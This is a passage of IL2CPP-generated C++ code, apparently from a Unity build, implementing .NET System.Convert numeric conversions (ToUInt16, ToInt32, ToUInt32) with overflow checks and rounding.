Convert_ToUInt16_m19D8F9B74EB5F96C835FA5045E925F000750A8B3_RuntimeMethod_var); } IL_0018: { uint32_t L_3 = ___value0; return (uint16_t)(((int32_t)((uint16_t)L_3))); } } // System.UInt16 System.Convert::ToUInt16(System.Int64) extern "C" IL2CPP_METHOD_ATTR uint16_t Convert_ToUInt16_mA5386907A6E781E3D4261BDB7D6308FBD5B518F7 (int64_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt16_mA5386907A6E781E3D4261BDB7D6308FBD5B518F7_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int64_t L_0 = ___value0; if ((((int64_t)L_0) < ((int64_t)(((int64_t)((int64_t)0)))))) { goto IL_000e; } } { int64_t L_1 = ___value0; if ((((int64_t)L_1) <= ((int64_t)(((int64_t)((int64_t)((int32_t)65535))))))) { goto IL_001e; } } IL_000e: { String_t* L_2 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral6972AB6A4112783DFDFEE444146EB3CF741CCD13, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_3 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_3, L_2, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_3, NULL, Convert_ToUInt16_mA5386907A6E781E3D4261BDB7D6308FBD5B518F7_RuntimeMethod_var); } IL_001e: { int64_t L_4 = ___value0; return (uint16_t)(((int32_t)((uint16_t)L_4))); } } // System.UInt16 System.Convert::ToUInt16(System.UInt64) extern "C" IL2CPP_METHOD_ATTR uint16_t Convert_ToUInt16_mC540754A3F101A7A13FB26FD89836025507E7E80 (uint64_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt16_mC540754A3F101A7A13FB26FD89836025507E7E80_MetadataUsageId); s_Il2CppMethodInitialized = true; } { uint64_t L_0 = ___value0; if ((!(((uint64_t)L_0) > ((uint64_t)(((int64_t)((int64_t)((int32_t)65535)))))))) { goto IL_0019; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral6972AB6A4112783DFDFEE444146EB3CF741CCD13, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToUInt16_mC540754A3F101A7A13FB26FD89836025507E7E80_RuntimeMethod_var); } IL_0019: { uint64_t L_3 = ___value0; return (uint16_t)(((int32_t)((uint16_t)L_3))); } } // System.UInt16 System.Convert::ToUInt16(System.Single) extern "C" IL2CPP_METHOD_ATTR uint16_t Convert_ToUInt16_m13E0B382AD753A7931E9583BDF9091719617F70C (float ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt16_m13E0B382AD753A7931E9583BDF9091719617F70C_MetadataUsageId); s_Il2CppMethodInitialized = true; } { float L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); uint16_t L_1 = Convert_ToUInt16_mC488D697C85EE1862D2D8FFFD30BC8E99AB73BE5((((double)((double)L_0))), /*hidden argument*/NULL); return L_1; } } // System.UInt16 System.Convert::ToUInt16(System.Double) extern "C" IL2CPP_METHOD_ATTR uint16_t Convert_ToUInt16_mC488D697C85EE1862D2D8FFFD30BC8E99AB73BE5 (double ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt16_mC488D697C85EE1862D2D8FFFD30BC8E99AB73BE5_MetadataUsageId); s_Il2CppMethodInitialized = true; } { double L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); int32_t L_1 = Convert_ToInt32_m1A048B98439E87B6AA81AEA091F8F515D3EF730C(L_0, /*hidden argument*/NULL); uint16_t L_2 = Convert_ToUInt16_m926B887258078B9BB42574AA2B3F95DC50460EA7(L_1, /*hidden argument*/NULL); return L_2; } } // System.UInt16 System.Convert::ToUInt16(System.Decimal) extern "C" IL2CPP_METHOD_ATTR uint16_t Convert_ToUInt16_m022D5C7E373AE755EF157BE123D6856C9A931DFC (Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt16_m022D5C7E373AE755EF157BE123D6856C9A931DFC_MetadataUsageId); s_Il2CppMethodInitialized = true; } { Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_1 = Decimal_Round_mD73CF41AB10D501F9DAD3F351007B361017F2801(L_0, 0, /*hidden argument*/NULL); uint16_t L_2 = Decimal_ToUInt16_m549253A5DF0667C9938591FA692ACFE8D812C065(L_1, /*hidden argument*/NULL); return L_2; } } // System.UInt16 System.Convert::ToUInt16(System.String,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint16_t Convert_ToUInt16_mB588DD91980D07B2021231090F8C3EE517DDFFA1 (String_t* ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { { String_t* L_0 = ___value0; if (L_0) { goto IL_0005; } } { return (uint16_t)0; } IL_0005: { String_t* L_1 = ___value0; RuntimeObject* L_2 = ___provider1; uint16_t L_3 = UInt16_Parse_mEA6E086539E279750BCC41E5C9638C2514924E8B(L_1, 7, L_2, /*hidden argument*/NULL); return L_3; } } // System.Int32 System.Convert::ToInt32(System.Object) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_ToInt32_mCF1152AF4138C1DD7A16643B22EE69A38373EF86 (RuntimeObject * ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt32_mCF1152AF4138C1DD7A16643B22EE69A38373EF86_MetadataUsageId); s_Il2CppMethodInitialized = true; } { RuntimeObject * L_0 = ___value0; if (!L_0) { goto IL_0010; } } { RuntimeObject * L_1 = ___value0; int32_t L_2 = InterfaceFuncInvoker1< int32_t, RuntimeObject* >::Invoke(7 /* System.Int32 System.IConvertible::ToInt32(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, ((RuntimeObject*)Castclass((RuntimeObject*)L_1, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var)), (RuntimeObject*)NULL); return L_2; } IL_0010: { return 0; } } // System.Int32 System.Convert::ToInt32(System.Object,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_ToInt32_m5D40340597602FB6C20BAB933E8B29617232757A (RuntimeObject * ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt32_m5D40340597602FB6C20BAB933E8B29617232757A_MetadataUsageId); s_Il2CppMethodInitialized = true; } { RuntimeObject * L_0 = ___value0; if (!L_0) { goto IL_0010; } } { RuntimeObject * L_1 = ___value0; RuntimeObject* L_2 = ___provider1; int32_t L_3 = InterfaceFuncInvoker1< int32_t, RuntimeObject* >::Invoke(7 /* System.Int32 System.IConvertible::ToInt32(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, ((RuntimeObject*)Castclass((RuntimeObject*)L_1, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var)), L_2); return L_3; } IL_0010: { return 0; } } // System.Int32 System.Convert::ToInt32(System.Boolean) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_ToInt32_m39901AE09C5431063E0EDBD286948E875E747B66 (bool ___value0, const RuntimeMethod* method) { { bool L_0 = ___value0; if (L_0) { goto IL_0005; } } { return 0; } IL_0005: { return 1; } } // System.Int32 System.Convert::ToInt32(System.Char) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_ToInt32_m8BE65713C8D5E0AD45D53B82A5A7BD187BEBA917 (Il2CppChar ___value0, const RuntimeMethod* method) { { Il2CppChar L_0 = ___value0; return L_0; } } // System.Int32 System.Convert::ToInt32(System.Byte) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_ToInt32_m322C82C3EB50E7389A4A38C4601FD08705CA56CF (uint8_t ___value0, const RuntimeMethod* method) { { uint8_t L_0 = ___value0; return L_0; } } // System.Int32 System.Convert::ToInt32(System.Int16) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_ToInt32_mB0AA47EFAB81D1DBA0C2153ECBD0E19DE230BE2C (int16_t ___value0, const RuntimeMethod* method) { { int16_t L_0 = ___value0; return L_0; } } // System.Int32 System.Convert::ToInt32(System.UInt16) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_ToInt32_m8A95C977AFB27DA577E58CAE3255F8B24EE79517 (uint16_t ___value0, const RuntimeMethod* method) { { uint16_t L_0 = ___value0; return L_0; } } // System.Int32 System.Convert::ToInt32(System.UInt32) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_ToInt32_m966337716B0CC4A45307D82BC21BCA1F8BB22D1C (uint32_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt32_m966337716B0CC4A45307D82BC21BCA1F8BB22D1C_MetadataUsageId); s_Il2CppMethodInitialized = true; } { uint32_t L_0 = ___value0; if ((!(((uint32_t)L_0) > ((uint32_t)((int32_t)2147483647LL))))) { goto IL_0018; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral858B28677610CF07E111998CCE040F14F5256455, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToInt32_m966337716B0CC4A45307D82BC21BCA1F8BB22D1C_RuntimeMethod_var); } IL_0018: { uint32_t L_3 = ___value0; return L_3; } } // System.Int32 System.Convert::ToInt32(System.Int64) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_ToInt32_m5CE30569A0A5B70CBD85954BEEF436F57D6FAE6B (int64_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt32_m5CE30569A0A5B70CBD85954BEEF436F57D6FAE6B_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int64_t L_0 = ___value0; if ((((int64_t)L_0) < ((int64_t)(((int64_t)((int64_t)((int32_t)-2147483648LL))))))) { goto IL_0012; } } { int64_t L_1 = ___value0; if ((((int64_t)L_1) <= ((int64_t)(((int64_t)((int64_t)((int32_t)2147483647LL))))))) { goto IL_0022; } } IL_0012: { String_t* L_2 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral858B28677610CF07E111998CCE040F14F5256455, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_3 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_3, L_2, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_3, NULL, Convert_ToInt32_m5CE30569A0A5B70CBD85954BEEF436F57D6FAE6B_RuntimeMethod_var); } IL_0022: { int64_t L_4 = ___value0; return (((int32_t)((int32_t)L_4))); } } // System.Int32 System.Convert::ToInt32(System.UInt64) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_ToInt32_m4E8E4BA500C8372D58B20E706C76C8126F7F5260 (uint64_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt32_m4E8E4BA500C8372D58B20E706C76C8126F7F5260_MetadataUsageId); s_Il2CppMethodInitialized = true; } { uint64_t L_0 = ___value0; if ((!(((uint64_t)L_0) > ((uint64_t)(((int64_t)((int64_t)((int32_t)2147483647LL)))))))) { goto IL_0019; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral858B28677610CF07E111998CCE040F14F5256455, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToInt32_m4E8E4BA500C8372D58B20E706C76C8126F7F5260_RuntimeMethod_var); } IL_0019: { uint64_t L_3 = ___value0; return (((int32_t)((int32_t)L_3))); } } // System.Int32 System.Convert::ToInt32(System.Single) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_ToInt32_mA9271FF590B90ADF4072A0FBF2C7F59874FA5EC4 (float ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt32_mA9271FF590B90ADF4072A0FBF2C7F59874FA5EC4_MetadataUsageId); s_Il2CppMethodInitialized = true; } { float L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Convert_t1C7A851BFB2F0782FD7F72F6AA1DCBB7B53A9C7E_il2cpp_TypeInfo_var); int32_t L_1 = Convert_ToInt32_m1A048B98439E87B6AA81AEA091F8F515D3EF730C((((double)((double)L_0))), /*hidden argument*/NULL); return L_1; } } // System.Int32 System.Convert::ToInt32(System.Double) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_ToInt32_m1A048B98439E87B6AA81AEA091F8F515D3EF730C (double ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt32_m1A048B98439E87B6AA81AEA091F8F515D3EF730C_MetadataUsageId); s_Il2CppMethodInitialized = true; } int32_t V_0 = 0; double V_1 = 0.0; int32_t V_2 = 0; double V_3 = 0.0; { double L_0 = ___value0; if ((!(((double)L_0) >= ((double)(0.0))))) { goto IL_0043; } } { double L_1 = ___value0; if ((!(((double)L_1) < ((double)(2147483647.5))))) { goto IL_007a; } } { double L_2 = ___value0; V_0 = (((int32_t)((int32_t)L_2))); double L_3 = ___value0; int32_t L_4 = V_0; V_1 = ((double)il2cpp_codegen_subtract((double)L_3, (double)(((double)((double)L_4))))); double L_5 = V_1; if ((((double)L_5) > ((double)(0.5)))) { goto IL_003d; } } { double L_6 = V_1; if ((!(((double)L_6) == ((double)(0.5))))) { goto IL_0041; } } { int32_t L_7 = V_0; if (!((int32_t)((int32_t)L_7&(int32_t)1))) { goto IL_0041; } } IL_003d: { int32_t L_8 = V_0; V_0 = ((int32_t)il2cpp_codegen_add((int32_t)L_8, (int32_t)1)); } IL_0041: { int32_t L_9 = V_0; return L_9; } IL_0043: { double L_10 = ___value0; if ((!(((double)L_10) >= ((double)(-2147483648.5))))) { goto IL_007a; } } { double L_11 = ___value0; V_2 = (((int32_t)((int32_t)L_11))); double L_12 = ___value0; int32_t L_13 = V_2; V_3 = ((double)il2cpp_codegen_subtract((double)L_12, (double)(((double)((double)L_13))))); double L_14 = V_3; if ((((double)L_14) < ((double)(-0.5)))) { goto IL_0074; } } { double L_15 = V_3; if ((!(((double)L_15) == ((double)(-0.5))))) { goto IL_0078; } } { int32_t L_16 = V_2; if (!((int32_t)((int32_t)L_16&(int32_t)1))) { goto IL_0078; } } IL_0074: { int32_t L_17 = V_2; V_2 = ((int32_t)il2cpp_codegen_subtract((int32_t)L_17, (int32_t)1)); } IL_0078: { int32_t L_18 = V_2; return L_18; } IL_007a: { String_t* L_19 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral858B28677610CF07E111998CCE040F14F5256455, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_20 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_20, L_19, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_20, NULL, Convert_ToInt32_m1A048B98439E87B6AA81AEA091F8F515D3EF730C_RuntimeMethod_var); } } // System.Int32 System.Convert::ToInt32(System.Decimal) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_ToInt32_m4D644EB3F03017202A65F4CADB3382BF81FF5D71 (Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToInt32_m4D644EB3F03017202A65F4CADB3382BF81FF5D71_MetadataUsageId); s_Il2CppMethodInitialized = true; } { Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 L_0 = ___value0; IL2CPP_RUNTIME_CLASS_INIT(Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8_il2cpp_TypeInfo_var); int32_t L_1 = Decimal_FCallToInt32_m4B063BBD3E2F9CDA39F8C09A6E81C05567FC0C1A(L_0, /*hidden argument*/NULL); return L_1; } } // System.Int32 System.Convert::ToInt32(System.String,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int32_t Convert_ToInt32_mB68D58347DE1545BF338A8435E2567C9EAB5905E (String_t* ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { { String_t* L_0 = ___value0; if (L_0) { goto IL_0005; } } { return 0; } IL_0005: { String_t* L_1 = ___value0; RuntimeObject* L_2 = ___provider1; int32_t L_3 = Int32_Parse_m17BA45CC13A0E08712F2EE60CC1356291D0592AC(L_1, 7, L_2, /*hidden argument*/NULL); return L_3; } } // System.UInt32 System.Convert::ToUInt32(System.Object,System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint32_t Convert_ToUInt32_mB53B83E03C15DCD785806793ACC3083FCC7F4BCA (RuntimeObject * ___value0, RuntimeObject* ___provider1, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt32_mB53B83E03C15DCD785806793ACC3083FCC7F4BCA_MetadataUsageId); s_Il2CppMethodInitialized = true; } { RuntimeObject * L_0 = ___value0; if (!L_0) { goto IL_0010; } } { RuntimeObject * L_1 = ___value0; RuntimeObject* L_2 = ___provider1; uint32_t L_3 = InterfaceFuncInvoker1< uint32_t, RuntimeObject* >::Invoke(8 /* System.UInt32 System.IConvertible::ToUInt32(System.IFormatProvider) */, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var, ((RuntimeObject*)Castclass((RuntimeObject*)L_1, IConvertible_tB52671A602A64FCCFD27EA5817E2A6C2B693D380_il2cpp_TypeInfo_var)), L_2); return L_3; } IL_0010: { return 0; } } // System.UInt32 System.Convert::ToUInt32(System.Boolean) extern "C" IL2CPP_METHOD_ATTR uint32_t Convert_ToUInt32_m0A1093A798B8004A58C7905A23886132BDC347ED (bool ___value0, const RuntimeMethod* method) { { bool L_0 = ___value0; if (L_0) { goto IL_0005; } } { return 0; } IL_0005: { return 1; } } // System.UInt32 System.Convert::ToUInt32(System.Char) extern "C" IL2CPP_METHOD_ATTR uint32_t Convert_ToUInt32_m123C758E6CB699FCFD9E8ABCF1042C1CD70DE944 (Il2CppChar ___value0, const RuntimeMethod* method) { { Il2CppChar L_0 = ___value0; return L_0; } } // System.UInt32 System.Convert::ToUInt32(System.SByte) extern "C" IL2CPP_METHOD_ATTR uint32_t Convert_ToUInt32_m78245CD2AE3D0369F5A99FF013AF73FFBB8CF869 (int8_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt32_m78245CD2AE3D0369F5A99FF013AF73FFBB8CF869_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int8_t L_0 = ___value0; if ((((int32_t)L_0) >= ((int32_t)0))) { goto IL_0014; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral2E2FC55ECA0F95E74B3E4F4CEB108D4486D3F1A6, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToUInt32_m78245CD2AE3D0369F5A99FF013AF73FFBB8CF869_RuntimeMethod_var); } IL_0014: { int8_t L_3 = ___value0; return L_3; } } // System.UInt32 System.Convert::ToUInt32(System.Byte) extern "C" IL2CPP_METHOD_ATTR uint32_t Convert_ToUInt32_m4D054799D266E79452F38327EF9D954E0D3F64D3 (uint8_t ___value0, const RuntimeMethod* method) { { uint8_t L_0 = ___value0; return L_0; } } // System.UInt32 System.Convert::ToUInt32(System.Int16) extern "C" IL2CPP_METHOD_ATTR uint32_t Convert_ToUInt32_mC305AB953ECDC1EDEC3F76C2ED9C2898A6A2D8A8 (int16_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt32_mC305AB953ECDC1EDEC3F76C2ED9C2898A6A2D8A8_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int16_t L_0 = ___value0; if ((((int32_t)L_0) >= ((int32_t)0))) { goto IL_0014; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral2E2FC55ECA0F95E74B3E4F4CEB108D4486D3F1A6, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToUInt32_mC305AB953ECDC1EDEC3F76C2ED9C2898A6A2D8A8_RuntimeMethod_var); } IL_0014: { int16_t L_3 = ___value0; return L_3; } } // System.UInt32 System.Convert::ToUInt32(System.UInt16) extern "C" IL2CPP_METHOD_ATTR uint32_t Convert_ToUInt32_mED4922B504189D92D2F6F52BB959895A5979EE40 (uint16_t ___value0, const RuntimeMethod* method) { { uint16_t L_0 = ___value0; return L_0; } } // System.UInt32 System.Convert::ToUInt32(System.Int32) extern "C" IL2CPP_METHOD_ATTR uint32_t Convert_ToUInt32_mA22ABF80925CA54B6B4869939964184C7F344B41 (int32_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt32_mA22ABF80925CA54B6B4869939964184C7F344B41_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int32_t L_0 = ___value0; if ((((int32_t)L_0) >= ((int32_t)0))) { goto IL_0014; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral2E2FC55ECA0F95E74B3E4F4CEB108D4486D3F1A6, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToUInt32_mA22ABF80925CA54B6B4869939964184C7F344B41_RuntimeMethod_var); } IL_0014: { int32_t L_3 = ___value0; return L_3; } } // System.UInt32 System.Convert::ToUInt32(System.Int64) extern "C" IL2CPP_METHOD_ATTR uint32_t Convert_ToUInt32_mD1B91075B4D330E0D2D4600A6D5283C2FA1586E4 (int64_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt32_mD1B91075B4D330E0D2D4600A6D5283C2FA1586E4_MetadataUsageId); s_Il2CppMethodInitialized = true; } { int64_t L_0 = ___value0; if ((((int64_t)L_0) < ((int64_t)(((int64_t)((int64_t)0)))))) { goto IL_000a; } } { int64_t L_1 = ___value0; if ((((int64_t)L_1) <= ((int64_t)(((int64_t)((uint64_t)(((uint32_t)((uint32_t)(-1)))))))))) { goto IL_001a; } } IL_000a: { String_t* L_2 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral2E2FC55ECA0F95E74B3E4F4CEB108D4486D3F1A6, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_3 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_3, L_2, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_3, NULL, Convert_ToUInt32_mD1B91075B4D330E0D2D4600A6D5283C2FA1586E4_RuntimeMethod_var); } IL_001a: { int64_t L_4 = ___value0; return (((int32_t)((uint32_t)L_4))); } } // System.UInt32 System.Convert::ToUInt32(System.UInt64) extern "C" IL2CPP_METHOD_ATTR uint32_t Convert_ToUInt32_m7DC544C6EB3CA7920C82A243D9C387B462697BAC (uint64_t ___value0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (Convert_ToUInt32_m7DC544C6EB3CA7920C82A243D9C387B462697BAC_MetadataUsageId); s_Il2CppMethodInitialized = true; } { uint64_t L_0 = ___value0; if ((!(((uint64_t)L_0) > ((uint64_t)(((int64_t)((uint64_t)(((uint32_t)((uint32_t)(-1))))))))))) { goto IL_0015; } } { String_t* L_1 = Environment_GetResourceString_m2C75C2AF268F01E2BF34AD1C2E1352CF4BA51AD9(_stringLiteral2E2FC55ECA0F95E74B3E4F4CEB108D4486D3F1A6, /*hidden argument*/NULL); OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D * L_2 = (OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D *)il2cpp_codegen_object_new(OverflowException_tD89571E2350DE06D9DE4AB65ADCA77D607B5693D_il2cpp_TypeInfo_var); OverflowException__ctor_mE1A042FFEBF00B79612E8595B8D49785B357D731(L_2, L_1, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_2, NULL, Convert_ToUInt32_m7DC544C6EB3CA7920C82A243D9C387B462697BAC_RuntimeMethod_var); } 